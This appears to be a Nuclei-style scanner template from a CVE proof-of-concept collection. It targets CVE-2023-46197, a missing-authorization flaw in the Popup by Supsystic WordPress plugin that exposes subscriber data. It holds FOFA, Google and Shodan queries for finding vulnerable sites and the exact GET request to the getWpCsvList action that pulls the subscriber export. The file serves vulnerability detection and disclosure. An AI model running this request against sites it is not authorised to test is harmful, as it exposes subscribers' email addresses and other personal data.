4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2023-46197.yaml YAML
id: CVE-2023-46197

info:
  name: "Popup by Supsystic <= 1.10.19 - Missing Authorization to Sensitive Information Exposure"
  author: RandomRobbieBF
  severity: medium
  description: "The Popup by Supsystic plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.10.19 via the getWpCsvList action. This makes it possible for authenticated attackers with subscriber level access or higher to extract sensitive data including subscriber email addresses."
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/f458663f-6b1a-4acd-b2db-c66d7a915ab7?source=api-prod
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2023-46197
  metadata:
    fofa-query: "wp-content/plugins/popup-by-supsystic/"
    google-query: inurl:"/wp-content/plugins/popup-by-supsystic/"
    shodan-query: 'vuln:CVE-2023-46197'
    slug: 'popup-by-supsystic'
  tags: cve,wordpress,wp-plugin,popup-by-supsystic,medium

http:
  - method: GET
    redirects: true
    max-redirects: 3
    path:
      - "{{BaseURL}}/?mod=subscribe&action=getWpCsvList&pl=pps"


    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "PopUp ID"
        part: body
        condition: and

    
      - type: word
        words:
          - "Username"
        part: body
        condition: and

      - type: word
        words:
          - "Date Created"
        part: body
        condition: and